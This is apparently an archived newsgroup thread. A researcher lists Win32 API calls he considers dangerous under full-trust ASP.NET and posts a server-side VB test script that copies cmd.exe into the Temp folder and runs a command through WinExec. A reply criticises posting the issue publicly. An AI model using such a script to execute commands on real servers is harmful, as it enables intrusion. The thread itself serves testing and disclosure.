Asp.Net.Vulnerability: Win32 API calls (potential security problems)

[Dinis Cruz]

Asp.Net.Vulnerability: Win32 API calls (potential security problems)

Since win32 calls are supported in Asp.Net and cannot be disabled when
the website is running with 'Full trust', it is imperative to identify
all potentially dangerous Win32 DLLs. Here is a short list of the ones
we have identified whose risk needs to validated and (if required)
write test scripts for:

- New: CopyMemory, GetCurrentProcess, GetCurrentThread,
GetTokenInformation, GetWindowsInformation, isNTAdmin,
OpenProcessToken, OpenTheadToken, SendMessage
- Compress: CopyLZFile, LZCopy
- Crypto: CryptGetUserKey, CryptDestroyKey
- Drives: GetLogicalDrives, GetVolumeInformation
- EnvironmentVariables: GetEnvironmentString, GetEnvironmentVariable
- Error: RaiseExeption, ReportFault, SetLastError
- EventLog: OpenEventLog, ClearEventLog, ReportEvent
- Exit: ExitWindowsEx, FatalAppExit, InitiateSystemShutdown,
LockWorkstation
- Files: CopyFile, CreateFile, GetFileAttributes, MoveFile, OpenFile,
ReadFile, SetFileAttributes, SetFilePointer, SHGetFileInfo,
TouchFileTimes, Writefile, FindFile: FindClose, FindFirstFile,
FindNextFile
- Heap: GetProcessHeap, HeapAlloc, HeapFree
- Hook: CallNextHookEx, SetWindowsHookEx
- ICMP: IcmpCreateFile, IcmpSendEcho
- INI-Files: GetPrivateProfileSection , GetPrivateProfileString
- Internet: FtpGetFile, InternetAttemptConnect, InternetConnect,
InternetOpen, InternetOpenURL, InternetaReadFile,
IsDestinationReachable, IsNetworkAlive, IsValidURL, URLdownloadtoFile
- {List Not completed}

Since we are not Win32 API experts (although we did manage to write a
test script for the Kernel32 'WinExec' - see bellow) we would like ask
for help to the more serious win32 developers which will be able to
provide us with much more detailed and accurate information regarding
the 'security risk' posed by each API call.

The following is the code that we use in ANSA to test if a server is
vulnerable.

'************************************************* ***************
' ANSA:W32_execute_cmd - This test checks if it is possible to execute
' commands on the server using a direct Win32 API call to the
' kernel32 'winExec'function . For this test to work a copy of
'cmd.exe' must
' be copied to the same directory containing this script
'************************************************* ***************

<script runat=server>

Declare Function WinExec Lib "kernel32" Alias "WinExec" (ByVal
lpCmdLine As String, ByVal nCmdShow As Long) As Long
Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" (ByVal
lpExistingFileName As String, ByVal lpNewFileName As String, ByVal
bFailIfExists As Long) As Long

public Function Run_test(mode)

try
Dim winObj, objProcessInfo, item, local_dir, local_copy_of_cmd,
Target_copy_of_cmd
Dim objStartup, objConfig, objProcess, errReturn, intProcessID,
temp_name
Dim FailIfExists

Dim Cmd_to_execute = "dir"

local_dir = left(request.servervariables("PATH_TRANSLATED"), _

inStrRev(request.servervariables("PATH_TRANSLATED" ),"\"))
local_copy_of_cmd = Local_dir+"cmd.exe"
Target_copy_of_cmd =
Environment.GetEnvironmentVariable("Temp")+"\_test .exe"

' Copy CMD.EXE to temp directory
CopyFile(local_copy_of_cmd, Target_copy_of_cmd,FailIfExists)

' Execute Command and save results in temp file
errReturn = WinExec(Target_copy_of_cmd + " /c " +
cmd_to_execute, 10)


Run_test = OK + Critical +" The server allows the remote
execution of commands using a direct call to WinExec API!"
catch
Run_test = OK + low + "It was not possible to execute commands
using cmd.exe"
end try

end function

</script>

'************************************************* ***************

Thanks for the help

Best regards

[Susan Bradley, CPA aka Ebitz - SBS Rocks [MVP]]

Dinis ..why not forward this as it should be to [email]secure@microsoft.com[/email]

The Microsoft Security Response Center (MSRC) draws on the hundreds of
security professionals at Microsoft to form virtual teams that respond
to reports of security issues with Microsoft products or technologies.
To report a suspected vulnerability, please send e-mail to
[email]Secure@microsoft.com[/email].

Posting a potential vulnerablity to a public newsgroup is not showing
good judgement for dislosure of vulnerabilities assuming these are valid.

Report responsbility for all of our benefit on the Internet.

Susan

Dinis Cruz wrote:

> Asp.Net.Vulnerability: Win32 API calls (potential security problems)
>
> Since win32 calls are supported in Asp.Net and cannot be disabled when
> the website is running with 'Full trust', it is imperative to identify
> all potentially dangerous Win32 DLLs. Here is a short list of the ones
> we have identified whose risk needs to validated and (if required)
> write test scripts for:
>
> - New: CopyMemory, GetCurrentProcess, GetCurrentThread,
> GetTokenInformation, GetWindowsInformation, isNTAdmin,
> OpenProcessToken, OpenTheadToken, SendMessage
> - Compress: CopyLZFile, LZCopy
> - Crypto: CryptGetUserKey, CryptDestroyKey
> - Drives: GetLogicalDrives, GetVolumeInformation
> - EnvironmentVariables: GetEnvironmentString, GetEnvironmentVariable
> - Error: RaiseExeption, ReportFault, SetLastError
> - EventLog: OpenEventLog, ClearEventLog, ReportEvent
> - Exit: ExitWindowsEx, FatalAppExit, InitiateSystemShutdown,
> LockWorkstation
> - Files: CopyFile, CreateFile, GetFileAttributes, MoveFile, OpenFile,
> ReadFile, SetFileAttributes, SetFilePointer, SHGetFileInfo,
> TouchFileTimes, Writefile, FindFile: FindClose, FindFirstFile,
> FindNextFile
> - Heap: GetProcessHeap, HeapAlloc, HeapFree
> - Hook: CallNextHookEx, SetWindowsHookEx
> - ICMP: IcmpCreateFile, IcmpSendEcho
> - INI-Files: GetPrivateProfileSection , GetPrivateProfileString
> - Internet: FtpGetFile, InternetAttemptConnect, InternetConnect,
> InternetOpen, InternetOpenURL, InternetaReadFile,
> IsDestinationReachable, IsNetworkAlive, IsValidURL, URLdownloadtoFile
> - {List Not completed}
>
> Since we are not Win32 API experts (although we did manage to write a
> test script for the Kernel32 'WinExec' - see bellow) we would like ask
> for help to the more serious win32 developers which will be able to
> provide us with much more detailed and accurate information regarding
> the 'security risk' posed by each API call.
>
> The following is the code that we use in ANSA to test if a server is
> vulnerable.
>
> '************************************************* ***************
> ' ANSA:W32_execute_cmd - This test checks if it is possible to execute
> ' commands on the server using a direct Win32 API call to the
> ' kernel32 'winExec'function . For this test to work a copy of
> 'cmd.exe' must
> ' be copied to the same directory containing this script
> '************************************************* ***************
>
> <script runat=server>
>
> Declare Function WinExec Lib "kernel32" Alias "WinExec" (ByVal
> lpCmdLine As String, ByVal nCmdShow As Long) As Long
> Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" (ByVal
> lpExistingFileName As String, ByVal lpNewFileName As String, ByVal
> bFailIfExists As Long) As Long
>
> public Function Run_test(mode)
>
> try
> Dim winObj, objProcessInfo, item, local_dir, local_copy_of_cmd,
> Target_copy_of_cmd
> Dim objStartup, objConfig, objProcess, errReturn, intProcessID,
> temp_name
> Dim FailIfExists
>
> Dim Cmd_to_execute = "dir"
>
> local_dir = left(request.servervariables("PATH_TRANSLATED"), _
>
> inStrRev(request.servervariables("PATH_TRANSLATED" ),"\"))
> local_copy_of_cmd = Local_dir+"cmd.exe"
> Target_copy_of_cmd =
> Environment.GetEnvironmentVariable("Temp")+"\_test .exe"
>
> ' Copy CMD.EXE to temp directory
> CopyFile(local_copy_of_cmd, Target_copy_of_cmd,FailIfExists)
>
> ' Execute Command and save results in temp file
> errReturn = WinExec(Target_copy_of_cmd + " /c " +
> cmd_to_execute, 10)
>
>
> Run_test = OK + Critical +" The server allows the remote
> execution of commands using a direct call to WinExec API!"
> catch
> Run_test = OK + low + "It was not possible to execute commands
> using cmd.exe"
> end try
>
> end function
>
> </script>
>
> '************************************************* ***************
>
> Thanks for the help
>
> Best regards

--
"Don't lose sight of security. Security is a state of being,
not a state of budget. He with the most firewalls still does
not win. Put down that honeypot and keep up to date on your patches.
Demand better security from vendors and hold them responsible.
Use what you have, and make sure you know how to use it properly
and effectively."
~Rain Forest Puppy
[url]http://www.wiretrip.net/rfp/txt/evolution.txt[/url]